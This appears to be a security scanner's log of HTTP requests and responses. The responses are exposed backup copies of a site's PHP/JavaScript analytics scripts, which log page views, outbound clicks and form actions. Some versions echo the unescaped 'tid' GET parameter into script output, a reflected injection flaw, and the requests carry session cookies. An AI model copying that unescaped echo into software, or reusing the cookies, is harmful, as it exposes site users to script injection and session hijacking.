Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:18 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 18:45:08 GMT
ETag: "2548024-10b1-45447abc3f500"
Accept-Ranges: bytes
Content-Length: 4273
Keep-Alive: timeout=15, max=86
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

if (isset($_GET['ait']) && $_GET['ait'] == 'true') {
$allowInternalTracking = 'true';
} else {
$allowInternalTracking = 'false';
}

?>

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth +
"&ait=<?php echo $allowInternalTracking ?>"
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/initBlvdJS.php_2008_09_10_r1

/blvdstatus/js/initBlvdJS.php_2008_09_10_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2008_09_10_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2008_09_10_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:18 GMT
Server: Apache
Last-Modified: Tue, 12 Aug 2008 19:36:35 GMT
ETag: "2548025-14d1-4544863c3d6c0"
Accept-Ranges: bytes
Content-Length: 5329
Keep-Alive: timeout=15, max=85
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

if (isset($_GET['ait']) && $_GET['ait'] == 'true') {
$allowInternalTracking = 'true';
} else {
$allowInternalTracking = 'false';
}

?>

/**
*
* URL encode / decode
* http://www.webtoolkit.info/
*
* [CB] Compressed by YUI Compressor
**/
var Url={encode:function(A){return escape(this._utf8_encode(A))},decode:function(A){return this._utf8_decode(unescape(A))},_utf8_encode:function(B){B=B.replace(/\r\n/g,"\n");var A="";for(var D=0;D<B.length;D++){var C=B.charCodeAt(D);if(C<128){A+=String.fromCharCode(C)}else{if((C>127)&&(C<2048)){A+=String.fromCharCode((C>>6)|192);A+=String.fromCharCode((C&63)|128)}else{A+=String.fromCharCode((C>>12)|224);A+=String.fromCharCode(((C>>6)&63)|128);A+=String.fromCharCode((C&63)|128)}}}return A},_utf8_decode:function(A){var B="";var C=0;var D=c1=c2=0;while(C<A.length){D=A.charCodeAt(C);if(D<128){B+=String.fromCharCode(D);C++}else{if((D>191)&&(D<224)){c2=A.charCodeAt(C+1);B+=String.fromCharCode(((D&31)<<6)|(c2&63));C+=2}else{c2=A.charCodeAt(C+1);c3=A.charCodeAt(C+2);B+=String.fromCharCode(((D&15)<<12)|((c2&63)<<6)|(c3&63));C+=3}}}return B}};

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
* [CB] Replaced by webtoolkit's URL encoder
*/
function URLEncode (clearString) {
/*
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
*/

return Url.encode(clearString);
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth +
"&ait=<?php echo $allowInternalTracking ?>"
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/initBlvdJS.php_2009_03_16_r1

/blvdstatus/js/initBlvdJS.php_2009_03_16_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2009_03_16_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2009_03_16_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:18 GMT
Server: Apache
Last-Modified: Wed, 10 Sep 2008 15:29:37 GMT
ETag: "2548026-12c4-4568c51f0fa40"
Accept-Ranges: bytes
Content-Length: 4804
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

if (isset($_GET['ait']) && $_GET['ait'] == 'true') {
$allowInternalTracking = 'true';
} else {
$allowInternalTracking = 'false';
}

if (isset($_GET['tid'])) {
$trackingId = $_GET['tid'];
} else {
$trackingId = 0;
}

?>

/**
*
* URL encode / decode
* http://www.webtoolkit.info/
*
* [CB] Compressed by YUI Compressor
**/
var Url={encode:function(A){return escape(this._utf8_encode(A))},decode:function(A){return this._utf8_decode(unescape(A))},_utf8_encode:function(B){B=B.replace(/\r\n/g,"\n");var A="";for(var D=0;D<B.length;D++){var C=B.charCodeAt(D);if(C<128){A+=String.fromCharCode(C)}else{if((C>127)&&(C<2048)){A+=String.fromCharCode((C>>6)|192);A+=String.fromCharCode((C&63)|128)}else{A+=String.fromCharCode((C>>12)|224);A+=String.fromCharCode(((C>>6)&63)|128);A+=String.fromCharCode((C&63)|128)}}}return A},_utf8_decode:function(A){var B="";var C=0;var D=c1=c2=0;while(C<A.length){D=A.charCodeAt(C);if(D<128){B+=String.fromCharCode(D);C++}else{if((D>191)&&(D<224)){c2=A.charCodeAt(C+1);B+=String.fromCharCode(((D&31)<<6)|(c2&63));C+=2}else{c2=A.charCodeAt(C+1);c3=A.charCodeAt(C+2);B+=String.fromCharCode(((D&15)<<12)|((c2&63)<<6)|(c3&63));C+=3}}}return B}};

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
* [CB] Replaced by webtoolkit's URL encoder
*/
function URLEncode (clearString) {
return Url.encode(clearString);
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth +
"&ait=<?php echo $allowInternalTracking ?>" +
"&tid=<?php echo $trackingId ?>"
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/initBlvdJS.php_2009_06_12_r1

/blvdstatus/js/initBlvdJS.php_2009_06_12_r1

http://www.seoq.com/blvdstatus/js/initBlvdJS.php_2009_06_12_r1

Request

GET /blvdstatus/js/initBlvdJS.php_2009_06_12_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:18 GMT
Server: Apache
Last-Modified: Wed, 18 Mar 2009 07:42:50 GMT
ETag: "2548027-133a-4655fd499f280"
Accept-Ranges: bytes
Content-Length: 4922
Keep-Alive: timeout=15, max=84
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

<?php
header('Content-type: text/javascript');

require_once("../inc/serverSetup.php");

if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE_SECURE);
} else {
define('DYNAMIC_URL_BASE', URL_BLVD_BASE);
}

if (isset($_GET['ait']) && $_GET['ait'] == 'true') {
$allowInternalTracking = 'true';
} else {
$allowInternalTracking = 'false';
}

if (isset($_GET['tid'])) {
$trackingId = $_GET['tid'];
} else {
$trackingId = 0;
}

// [CB] 2009-03-16: Temporarily disabled tracking for table split
//die('// BLVD Status is current being updated');
?>

/**
*
* URL encode / decode
* http://www.webtoolkit.info/
*
* [CB] Compressed by YUI Compressor
**/
var Url={encode:function(A){return escape(this._utf8_encode(A))},decode:function(A){return this._utf8_decode(unescape(A))},_utf8_encode:function(B){B=B.replace(/\r\n/g,"\n");var A="";for(var D=0;D<B.length;D++){var C=B.charCodeAt(D);if(C<128){A+=String.fromCharCode(C)}else{if((C>127)&&(C<2048)){A+=String.fromCharCode((C>>6)|192);A+=String.fromCharCode((C&63)|128)}else{A+=String.fromCharCode((C>>12)|224);A+=String.fromCharCode(((C>>6)&63)|128);A+=String.fromCharCode((C&63)|128)}}}return A},_utf8_decode:function(A){var B="";var C=0;var D=c1=c2=0;while(C<A.length){D=A.charCodeAt(C);if(D<128){B+=String.fromCharCode(D);C++}else{if((D>191)&&(D<224)){c2=A.charCodeAt(C+1);B+=String.fromCharCode(((D&31)<<6)|(c2&63));C+=2}else{c2=A.charCodeAt(C+1);c3=A.charCodeAt(C+2);B+=String.fromCharCode(((D&15)<<12)|((c2&63)<<6)|(c3&63));C+=3}}}return B}};

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
* [CB] Replaced by webtoolkit's URL encoder
*/
function URLEncode (clearString) {
return Url.encode(clearString);
}

/*
* Cookie functions -- taken from:
* http://www.quirksmode.org/js/cookies.html
*/
function createCookie(name,value,days) {
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Cookie functions -- modified from:
* http://www.quirksmode.org/js/cookies.html
*/
function createShortTermCookie(name,value,minutes) {
if (minutes) {
var date = new Date();
date.setTime(date.getTime()+(minutes*60*1000));
var expires = "; expires="+date.toGMTString();
}
else var expires = "";
document.cookie = name+"="+value+expires+"; path=/";
}

/*
* Returns the value of the named cookie, or null if no such cookie
* exists.
*/
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++) {
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}

/*
* Deletes the specified cookie.
*/
function eraseCookie(name) {
createCookie(name,"",-1);
}

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (object && typeof(object) == 'function');
}

/*
* The afterLoad function, which is responsible for triggering the
* dynamic JavaScript pull.
*/
function afterLoad() {
// We call all the existing onload functions _first_,
// in the hope that if they modify the document we
// will catch the changes.
if (isFunction(chain_onload)) {
chain_onload();
}

// Check and see if we have a BLVD session cookie,
// if so, maintain that session value. If not, a session
// value will be generated by the PHP script.
var blvdSessionId = readCookie("blvdSessionId");
if (blvdSessionId == null) blvdSessionId = '';

// Generate the dynamic javascript tag
var scriptTag = document.createElement("script");
scriptTag.src =
"<?php echo DYNAMIC_URL_BASE; ?>js/dynamicJS.php" +
"?blvdSessionId=" + blvdSessionId +
"&referrer=" + URLEncode(document.referrer) +
"&title=" + URLEncode(document.title) +
"&screenWidth=" + screen.width +
"&screenHeight=" + screen.height +
"&screenDepth=" + screen.colorDepth +
"&ait=<?php echo $allowInternalTracking ?>" +
"&tid=<?php echo $trackingId ?>"
;

var bodyNode = document.getElementsByTagName("body")[0];
bodyNode.appendChild(scriptTag);
}

/*
* Chain the BLVD afterLoad function into the OnLoad event handler.
* We store the current OnLoad handler first so we can call it
* from our own function.
*/

if (isFunction(window.addEventListener)) {
window.addEventListener('load', afterLoad, false);
} else if (isFunction(window.attachEvent)) {
window.attachEvent('load', afterLoad);
} else {
var chain_onload = window.onload;
window.onload = afterLoad;
}

- /blvdstatus/js/trackingJS.php_2008_08_06_r1

/blvdstatus/js/trackingJS.php_2008_08_06_r1

http://www.seoq.com/blvdstatus/js/trackingJS.php_2008_08_06_r1

Request

GET /blvdstatus/js/trackingJS.php_2008_08_06_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:19 GMT
Server: Apache
Last-Modified: Wed, 30 Jul 2008 14:41:57 GMT
ETag: "254802f-1939-4533ec2231740"
Accept-Ranges: bytes
Content-Length: 6457
Keep-Alive: timeout=15, max=87
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

var currentSessionId = '<?php echo $sessionId; ?>';
var currentNavigationId = '<?php echo $navigationId; ?>'

/*
* Utility function to test if another object is actually a function.
*/
function isFunction(object) {
return (typeof(object) != 'undefined' && typeof(object) == 'function');
}

function isDefined(object) {
return (typeof(object) != 'undefined');
}

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

function logOutgoingLink(node) {
var i = new Image();

i.src =
"<?php echo DYNAMIC_URL_BASE; ?>leave.php" +
"?url=" + URLEncode(node.href) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function logOutgoingForm(node) {
var i = new Image();

i.src =
"<?php echo DYNAMIC_URL_BASE; ?>leave.php" +
"?url=" + URLEncode(node.action) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function chainOnClick(node) {
if (isDefined(node.addEventListener)) {
node.addEventListener(
'click',
function() {
logOutgoingLink(this);
},
false
);
} else if (isDefined(node.attachEvent)) {
node.attachEvent(
'onclick',
function() {
logOutgoingLink(this);
}
);
} else {
var currentOnClick;

currentOnClick = node.onclick;

node.onclick = function() {
// Log the click
logOutgoingLink(this);

// Execute any existing on click function
if (isFunction(currentOnClick)) {
return currentOnClick();
}
}
}
}

function chainOnSubmit(node) {
if (isDefined(node.addEventListener)) {
node.addEventListener(
'submit',
function() {
logOutgoingForm(this);
},
false
);
} else if (isDefined(node.attachEvent)) {
node.attachEvent(
'onsubmit',
function() {
logOutgoingForm(this);
}
);
} else {
var currentOnSubmit;

currentOnSubmit = node.onsubmit;

node.onsubmit = function() {
// Log the click
logOutgoingForm(this);

// Execute any existing on click function
if (isFunction(currentOnSubmit)) {
return currentOnSubmit();
}
}
}
}

function replaceLinks(baseDocument) {
// Find every link:
// - A tags
var nodes = baseDocument.getElementsByTagName('a');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - FORM tags (catches onSubmit event)
nodes = baseDocument.getElementsByTagName('form');

for(var index = 0; index < nodes.length; index++) {
chainOnSubmit(nodes[index]);
}

// - AREA tags (for image maps)
nodes = baseDocument.getElementsByTagName('area');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - Digg proxy handling
// 2008-01-08 Note: Verified that IE reaches this point
/* nodes = baseDocument.getElementsByName('blvdDiggProxy'); */

// 2008-01-08: IE handles getElementsByName differently
// from Firefox. IE will return only tags with the NAME
// attribute set (actually according to spec). So for now
// we spoof the process for DIVs, SPANs, and Ps

var possibleDiggs = new Array();

nodes = baseDocument.getElementsByTagName('div');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('span');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = baseDocument.getElementsByTagName('p');
for(var index = 0; index < nodes.length; index++) possibleDiggs.push(nodes[index]);

nodes = new Array();
for(var index = 0; index < possibleDiggs.length; index++) {
node = possibleDiggs[index];

if (node.getAttribute == 'undefined') continue;

if (node.getAttribute('name') == 'blvdDiggProxy') {
nodes.push(node);
}
}

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];

// Check for any recognized digg_* attributes on the node
var attributeName;
var extraParameters = '';
var compact = false;
var url = document.location;

for(var i = 0; i < node.attributes.length; i++) {
attributeName = node.attributes[i].name;

if (attributeName.indexOf('digg_') != 0) continue;

if (attributeName == 'digg_skin' && node.attributes[i].value == 'compact') {
compact = true;
}

if (attributeName == 'digg_url') {
url = node.attributes[i].value;

// URL settings don't need to be added as extra parameters
continue;
}

extraParameters += "&" + attributeName + "=" + URLEncode(node.attributes[i].value);
}

// Replace the proxy element with an IFRAME containing
// the Digg proxy
var iframe = document.createElement("iframe");

iframe.src = "<?php echo DYNAMIC_URL_BASE; ?>proxy/digg.php" +
"?s=" + currentSessionId +
"&u=" + URLEncode(url) +
extraParameters
;
iframe.scrolling = "no";
iframe.setAttribute("frameBorder", "0");
iframe.setAttribute("border", "0");
iframe.frameborder = 0;

if (compact) {
iframe.width = "120";
iframe.height = "18"
} else {
iframe.width = "52";
iframe.height = "80"
}

nodes[index].appendChild(iframe);
}
}

// - RSS alternate link tags
var node;
var typeValue;
var nodes;
nodes = document.getElementsByTagName('link');

for(var index = 0; index < nodes.length; index++) {
node = nodes[index];
typeValue = node.getAttribute('type');

if (typeValue == 'application/rss+xml') {
}
}

createShortTermCookie('blvdSessionId', currentSessionId, 30);
replaceLinks(document);

- /blvdstatus/js/trackingJS.php_2008_07_30_r1

/blvdstatus/js/trackingJS.php_2008_07_30_r1

http://www.seoq.com/blvdstatus/js/trackingJS.php_2008_07_30_r1

Request

GET /blvdstatus/js/trackingJS.php_2008_07_30_r1 HTTP/1.1
Referer: http://www.seoq.com/blvdstatus/js/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.seoq.com
Cookie: PHPSESSID=sgei1l6e3nst43jti7f9ug76f0; CAKEPHP=3gmt3q74fne0s72akqsevm8685; temp_orgid=18bc00d6479f52c3222ea5887bfd07d0; temp_userid=42eb0c6051822e446cfea254f0248163
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:34:19 GMT
Server: Apache
Last-Modified: Wed, 25 Jun 2008 16:39:31 GMT
ETag: "254802e-15dc-45080522476c0"
Accept-Ranges: bytes
Content-Length: 5596
Keep-Alive: timeout=15, max=75
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

var currentSessionId = '<?php echo $sessionId; ?>';
var currentNavigationId = '<?php echo $navigationId; ?>'

/*
* Digg friendly URLEncode function -- taken from:
* http://cass-hacks.com/articles/code/js_url_encode_decode/
* [CB] Modified to use %20 instead of + for spaces
*/
function URLEncode (clearString) {
var output = '';
var x = 0;
clearString = clearString.toString();
var regex = /(^[a-zA-Z0-9_.]*)/;
while (x < clearString.length) {
var match = regex.exec(clearString.substr(x));
if (match != null && match.length > 1 && match[1] != '') {
output += match[1];
x += match[1].length;
} else {
if (clearString[x] == ' ')
output += '%20';
else {
var charCode = clearString.charCodeAt(x);
var hexVal = charCode.toString(16);
output += '%' + ( hexVal.length < 2 ? '0' : '' ) + hexVal.toUpperCase();
}
x++;
}
}

return output;
}

function logOutgoingLink(node) {
var i = new Image();

i.src =
"<?php echo URL_BLVD_BASE; ?>leave.php" +
"?url=" + URLEncode(node.href) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function logOutgoingForm(node) {
var i = new Image();

i.src =
"<?php echo URL_BLVD_BASE; ?>leave.php" +
"?url=" + URLEncode(node.action) +
"&nid=" + currentNavigationId +
"&tf=<?php echo $trackingFlags; ?>"
;
}

function chainOnClick(node) {
var currentOnClick;

currentOnClick = node.onclick;

node.onclick = function() {
// Log the click
logOutgoingLink(this);

// Execute any existing on click function
if (isFunction(currentOnClick)) {
currentOnClick();
}
}

//node.innerHTML += ' [' + currentNavigationId + ']';
}

function chainOnSubmit(node) {
var currentOnSubmit;

currentOnSubmit = node.onsubmit;

node.onsubmit = function() {
// Log the click
logOutgoingForm(this);

// Execute any existing on click function
if (isFunction(currentOnSubmit)) {
currentOnSubmit();
}
}
}

function replaceLinks(baseDocument) {
// Find every link:
// - A tags
var nodes = baseDocument.getElementsByTagName('a');

for(var index = 0; index < nodes.length; index++) {
chainOnClick(nodes[index]);
}

// - FORM tags (catches onSubmit event)
